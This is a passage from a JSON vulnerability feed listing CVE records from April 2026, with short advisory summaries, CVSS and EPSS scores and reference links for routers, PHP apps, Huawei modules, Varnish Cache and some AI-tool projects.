97e8115ab1110bc502b4b5e4a0c689a71520d335.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02102,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T05:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25208","summary":"Integer overflow vulnerability in Samsung Open Source Escargot allows Overflow Buffers.This issue affects Escargot: 97e8115ab1110bc502b4b5e4a0c689a71520d335.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00043,"ranking_epss":0.12876,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T05:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25209","summary":"Out-of-bounds read vulnerability in Samsung Open Source Escargot allows Resource Leak Exposure.This issue affects Escargot: 97e8115ab1110bc502b4b5e4a0c689a71520d335.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12511,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T05:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6157","summary":"A vulnerability was detected in Totolink A800R 4.1.2cu.5137_B20200730. This impacts the function setAppEasyWizardConfig in the library /lib/cste_modules/app.so. The manipulation of the argument apcliSsid results in buffer overflow. The attack can be executed remotely. 
The exploit is now public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00077,"ranking_epss":0.22868,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/xyh4ck/iot_poc/blob/main/TOTOLINK/A800R/01_Buffer_Overflow_setAppEasyWizardConfig.md","https://vuldb.com/submit/793114","https://vuldb.com/vuln/357037","https://vuldb.com/vuln/357037/cti","https://www.totolink.net/"],"published_time":"2026-04-13T04:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6155","summary":"A weakness has been identified in Totolink A7100RU 7.4cu.2313. The impacted element is the function setWanCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument pppoeServiceName can lead to os command injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_196/README.md","https://vuldb.com/submit/793679","https://vuldb.com/vuln/357035","https://vuldb.com/vuln/357035/cti","https://www.totolink.net/"],"published_time":"2026-04-13T04:16:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6156","summary":"A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setIpQosRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument Comment leads to os command injection. Remote exploitation of the attack is possible. 
The exploit has been disclosed publicly and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_197/README.md","https://vuldb.com/submit/793681","https://vuldb.com/vuln/357036","https://vuldb.com/vuln/357036/cti","https://www.totolink.net/"],"published_time":"2026-04-13T04:16:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6154","summary":"A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. The affected element is the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument wizard results in os command injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_194/README.md","https://vuldb.com/submit/792990","https://vuldb.com/vuln/357034","https://vuldb.com/vuln/357034/cti","https://www.totolink.net/"],"published_time":"2026-04-13T04:16:14","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34867","summary":"Double free vulnerability in the multi-mode input system.\nImpact: Successful exploitation of this vulnerability may affect 
availability.","cvss":5.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.6,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00392,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinlaptops/2026/4/"],"published_time":"2026-04-13T04:16:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6153","summary":"A vulnerability was identified in code-projects Vehicle Showroom Management System 1.0. Impacted is an unknown function of the file /util/StaffDetailsFunction.php. Such manipulation of the argument STAFF_ID leads to sql injection. The attack can be launched remotely. The exploit is publicly available and might be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/zheng-lv/CVE-/issues/4","https://vuldb.com/submit/796315","https://vuldb.com/vuln/357033","https://vuldb.com/vuln/357033/cti"],"published_time":"2026-04-13T04:16:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34853","summary":"Permission bypass vulnerability in the LBS module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":5e-05,"ranking_epss":0.00267,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinvision/2026/4/"],"published_time":"2026-04-13T04:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34856","summary":"UAF vulnerability in the communication module.\nImpact: Successful exploitation of this vulnerability may affect 
availability.","cvss":7.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00276,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T04:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34860","summary":"Access control vulnerability in the memo module.\nImpact: Successful exploitation of this vulnerability will affect availability and confidentiality.","cvss":4.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.1,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00392,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinlaptops/2026/4/"],"published_time":"2026-04-13T04:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34851","summary":"Race condition vulnerability in the event notification module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":2.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.2,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00319,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinlaptops/2026/4/"],"published_time":"2026-04-13T04:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34852","summary":"Stack overflow vulnerability in the media platform.\nImpact: Successful exploitation of this vulnerability may affect 
availability.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00309,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinlaptops/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T04:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34850","summary":"Race condition vulnerability in the notification service.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":1.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":1.9,"cvss_v4":null,"epss":5e-05,"ranking_epss":0.00262,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinlaptops/2026/4/"],"published_time":"2026-04-13T04:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-28553","summary":"Vulnerability of improper permission control in the theme setting module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.","cvss":6.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.9,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00414,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/"],"published_time":"2026-04-13T04:16:03","vendor":"huawei","product":"harmonyos","version":null},{"cve_id":"CVE-2026-28553","summary":"Vulnerability of improper permission control in the theme setting module.\nImpact: Successful exploitation of this vulnerability may affect service 
confidentiality.","cvss":6.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.9,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00414,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/"],"published_time":"2026-04-13T04:16:03","vendor":"huawei","product":"emui","version":null},{"cve_id":"CVE-2026-6152","summary":"A vulnerability was determined in code-projects Vehicle Showroom Management System 1.0. This issue affects some unknown processing of the file /util/StaffAddingFunction.php. This manipulation of the argument STAFF_ID causes sql injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/zheng-lv/CVE-/issues/3","https://vuldb.com/submit/796312","https://vuldb.com/vuln/357032","https://vuldb.com/vuln/357032/cti"],"published_time":"2026-04-13T03:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6179","summary":"Stored Cross Site Scripting in NightWolf Penetration Testing Platform allows attack trigger and run malicious script in user's browser","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00047,"ranking_epss":0.14223,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://bug.report.night-wolf.io/changelogs"],"published_time":"2026-04-13T03:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6150","summary":"A vulnerability has been found in code-projects Simple Laundry System 1.0. This affects an unknown part of the file /checkupdatestatus.php. The manipulation of the argument serviceId leads to cross site scripting. It is possible to initiate the attack remotely. 
The exploit has been disclosed to the public and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00033,"ranking_epss":0.09343,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/zheng-lv/CVE-/issues/1","https://vuldb.com/submit/796309","https://vuldb.com/vuln/357030","https://vuldb.com/vuln/357030/cti"],"published_time":"2026-04-13T03:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6151","summary":"A vulnerability was found in code-projects Vehicle Showroom Management System 1.0. This vulnerability affects unknown code of the file /util/PaymentStatusFunction.php. The manipulation of the argument CUSTOMER_ID results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/zheng-lv/CVE-/issues/2","https://vuldb.com/submit/796311","https://vuldb.com/vuln/357031","https://vuldb.com/vuln/357031/cti"],"published_time":"2026-04-13T03:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6148","summary":"A vulnerability was detected in code-projects Vehicle Showroom Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /util/MonthTotalReportUpdateFunction.php. Performing a manipulation of the argument BRANCH_ID results in sql injection. The attack is possible to be carried out remotely. 
The exploit is now public and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/mrpgi/cve/issues/2","https://vuldb.com/submit/796280","https://vuldb.com/vuln/357028","https://vuldb.com/vuln/357028/cti"],"published_time":"2026-04-13T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6149","summary":"A flaw has been found in code-projects Vehicle Showroom Management System 1.0. Affected by this issue is some unknown functionality of the file /util/BookVehicleFunction.php. Executing a manipulation of the argument BRANCH_ID can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/mrpgi/cve/issues/4","https://vuldb.com/submit/796282","https://vuldb.com/vuln/357029","https://vuldb.com/vuln/357029/cti"],"published_time":"2026-04-13T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6143","summary":"A security flaw has been discovered in farion1231 cc-switch up to 3.12.3. Affected by this issue is some unknown functionality of the file src-tauri/src/proxy/server.rs of the component ProxyServer. The manipulation results in permissive cross-domain policy with untrusted domains. The attack can be executed remotely. 
The exploit has been released to the public and may be used for attacks.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00021,"ranking_epss":0.05558,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/farion1231/cc-switch/","https://github.com/farion1231/cc-switch/issues/1841","https://github.com/farion1231/cc-switch/issues/1841#issue-4191294952","https://github.com/farion1231/cc-switch/pull/1915","https://vuldb.com/submit/796145","https://vuldb.com/vuln/357007","https://vuldb.com/vuln/357007/cti"],"published_time":"2026-04-13T02:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6142","summary":"A vulnerability was identified in tushar-2223 Hotel Management System up to bb1f3b3666124b888f1e4bcf51b6fba9fbb01d15. Affected by this vulnerability is an unknown functionality of the file /admin/roomdelete.php. The manipulation of the argument ID leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. 
The project was informed of the problem early through an issue report but has not responded yet.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gist.github.com/freeloader9527/a9ab20c922c6aa2b3eabf93e01a40f6b","https://github.com/tushar-2223/Hotel-Management-System/issues/15","https://vuldb.com/submit/795751","https://vuldb.com/vuln/357006","https://vuldb.com/vuln/357006/cti"],"published_time":"2026-04-13T01:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25204","summary":"Deserialization of untrusted data vulnerability in Samsung Open Source Escargot Java Script allows denial of service condition via process abort.\n\nThis issue affects escarogt prior to commit hash \n\n97e8115ab1110bc502b4b5e4a0c689a71520d335","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02435,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T01:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6139","summary":"A vulnerability has been found in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function UploadOpenVpnCert of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument FileName leads to os command injection. The attack can be launched remotely. 
The exploit has been disclosed to the public and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_192/README.md","https://vuldb.com/submit/792982","https://vuldb.com/vuln/357003","https://vuldb.com/vuln/357003/cti","https://www.totolink.net/"],"published_time":"2026-04-13T01:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6140","summary":"A vulnerability was found in Totolink A7100RU 7.4cu.2313_b20191024. This impacts the function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument FileName results in os command injection. The attack may be initiated remotely. The exploit has been made public and could be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_193/README.md","https://vuldb.com/submit/792987","https://vuldb.com/vuln/357004","https://vuldb.com/vuln/357004/cti","https://www.totolink.net/"],"published_time":"2026-04-13T01:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6141","summary":"A vulnerability was determined in danielmiessler Personal_AI_Infrastructure up to 2.3.0. Affected is an unknown function of the file Skills/Parser/Tools/parse_url.ts. Executing a manipulation can lead to os command injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. This patch is called 14322e87e58bf585cf3c7b9295578a6eb7dc4945. It is advisable to implement a patch to correct this issue. 
The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00734,"ranking_epss":0.7275,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/danielmiessler/Personal_AI_Infrastructure/","https://github.com/danielmiessler/Personal_AI_Infrastructure/commit/14322e87e58bf585cf3c7b9295578a6eb7dc4945","https://github.com/danielmiessler/Personal_AI_Infrastructure/pull/659","https://github.com/danielmiessler/Personal_AI_Infrastructure/pull/659#issuecomment-3905020094","https://vuldb.com/submit/793438","https://vuldb.com/vuln/357005","https://vuldb.com/vuln/357005/cti"],"published_time":"2026-04-13T01:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6136","summary":"A security vulnerability has been detected in Tenda F451 1.0.0.7_cn_svn7958. Impacted is the function frmL7ImForm of the file /goform/L7Im. The manipulation of the argument page leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/21","https://vuldb.com/submit/792880","https://vuldb.com/vuln/357000","https://vuldb.com/vuln/357000/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T00:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6137","summary":"A vulnerability was detected in Tenda F451 1.0.0.7_cn_svn7958. The affected element is the function fromAdvSetWan of the file /goform/AdvSetWan. The manipulation of the argument wanmode/PPPOEPassword results in stack-based buffer overflow. It is possible to launch the attack remotely. 
The exploit is now public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/22","https://vuldb.com/submit/792881","https://vuldb.com/vuln/357001","https://vuldb.com/vuln/357001/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T00:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6138","summary":"A flaw has been found in Totolink A7100RU 7.4cu.2313_b20191024. The impacted element is the function setAccessDeviceCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument mac causes os command injection. The attack can be initiated remotely. The exploit has been published and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_191/README.md","https://vuldb.com/submit/792980","https://vuldb.com/vuln/357002","https://vuldb.com/vuln/357002/cti","https://www.totolink.net/"],"published_time":"2026-04-13T00:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6135","summary":"A weakness has been identified in Tenda F451 1.0.0.7_cn_svn7958. This issue affects the function fromSetIpBind of the file /goform/SetIpBind. Executing a manipulation of the argument page can lead to stack-based buffer overflow. The attack may be performed from remote. 
The exploit has been made available to the public and could be used for attacks.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/19","https://vuldb.com/submit/792877","https://vuldb.com/vuln/356999","https://vuldb.com/vuln/356999/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T00:16:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6133","summary":"A vulnerability was identified in Tenda F451 1.0.0.7_cn_svn7958. This affects the function fromSafeUrlFilter of the file /goform/SafeUrlFilter. Such manipulation of the argument page leads to stack-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/17","https://vuldb.com/submit/792875","https://vuldb.com/vuln/356997","https://vuldb.com/vuln/356997/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6134","summary":"A security flaw has been discovered in Tenda F451 1.0.0.7_cn_svn7958. This vulnerability affects the function fromqossetting of the file /goform/qossetting. Performing a manipulation of the argument qos results in stack-based buffer overflow. The attack is possible to be carried out remotely. 
The exploit has been released to the public and may be used for attacks.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00017,"ranking_epss":0.04081,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/18","https://vuldb.com/submit/792876","https://vuldb.com/vuln/356998","https://vuldb.com/vuln/356998/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T23:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6131","summary":"A vulnerability was found in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this vulnerability is the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument command results in os command injection. The attack may be launched remotely. The exploit has been made public and could be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_182/README.md","https://vuldb.com/submit/792251","https://vuldb.com/vuln/356995","https://vuldb.com/vuln/356995/cti","https://www.totolink.net/"],"published_time":"2026-04-12T23:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6132","summary":"A vulnerability was determined in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this issue is the function setLedCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument enable causes os command injection. Remote exploitation of the attack is possible. 
The exploit has been publicly disclosed and may be utilized.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_183/README.md","https://vuldb.com/submit/792252","https://vuldb.com/vuln/356996","https://vuldb.com/vuln/356996/cti","https://www.totolink.net/"],"published_time":"2026-04-12T23:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6130","summary":"A flaw has been found in chatboxai chatbox up to 1.20.0. This impacts the function StdioClientTransport of the file src/main/mcp/ipc-stdio-transport.ts of the component Model Context Protocol Server Management System. Executing a manipulation of the argument args/env can lead to os command injection. The attack can be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00837,"ranking_epss":0.74667,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chatboxai/chatbox/","https://github.com/chatboxai/chatbox/issues/3627","https://github.com/chatboxai/chatbox/issues/3627#issue-4193060116","https://vuldb.com/submit/795355","https://vuldb.com/vuln/356993","https://vuldb.com/vuln/356993/cti"],"published_time":"2026-04-12T22:16:09","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40396","summary":"Varnish Cache 9 before 9.0.1 allows a \"workspace overflow\" denial of service (daemon panic) after timeout_linger. 
A malicious client could send an HTTP/1 request, wait long enough until the session releases its worker thread (timeout_linger) and resume traffic before the session is closed (timeout_idle) sending more than one request at once to trigger a pipelining operation between requests. This vulnerability affecting Varnish Cache 9.0.0 emerged from a port of the Varnish Enterprise non-blocking architecture for HTTP/2. New code was needed to adapt to a more recent workspace API that formalizes the pipelining operation. In addition to the workspace change on the Varnish Cache side, other differences created merge conflicts, like partial support for trailers in Varnish Enterprise. The conflict resolution missed one code path configuring pipelining to perform a complete workspace rollback, losing the guarantee that prefetched data would fit inside workspace_client during the transition from one request to the next. This can result in a workspace overflow, triggering a panic and crashing the Varnish server.","cvss":4.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.0,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.0163,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/varnish/varnish/issues/15","https://github.com/varnish/varnish/releases/tag/varnish-9.0.1"],"published_time":"2026-04-12T20:16:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6129","summary":"A vulnerability was detected in zhayujie chatgpt-on-wechat CowAgent up to 2.0.4. This affects an unknown function of the component Agent Mode Service. Performing a manipulation results in missing authentication. The attack can be initiated remotely. The exploit is now public and may be used. 
The project was informed of the problem early through an issue report but has not responded yet.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00088,"ranking_epss":0.25042,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/zhayujie/chatgpt-on-wechat/issues/2741","https://github.com/zhayujie/chatgpt-on-wechat/issues/2741#issue-4191903266","https://vuldb.com/submit/795272","https://vuldb.com/vuln/356992","https://vuldb.com/vuln/356992/cti"],"published_time":"2026-04-12T20:16:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40395","summary":"Varnish Enterprise before 6.0.16r12 allows a \"workspace overflow\" denial of service (daemon panic) for shared VCL. The headerplus.write_req0() function from vmod_headerplus updates the underlying req0, which is normally the original read-only request from which req is derived (readable and writable from VCL). This is useful in the active VCL, after amending req, to prepare a refined req0 before switching to a different VCL with the return (vcl(<label>)) action. This is for example how the Varnish Controller operates shared VCL deployments. If the amended req contained too many header fields for req0, this would have resulted in a workspace overflow that would in turn trigger a panic and crash the Varnish Enterprise server. This could be used as a Denial of Service attack vector by malicious clients.","cvss":4.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.0,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://docs.varnish-software.com/security/VEV00003/"],"published_time":"2026-04-12T20:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40394","summary":"Varnish Cache 9 before 9.0.1 and Varnish Enterprise before 6.0.16r11 allows a \"workspace overflow\" denial of service (daemon panic) for certain amounts of prefetched data. 
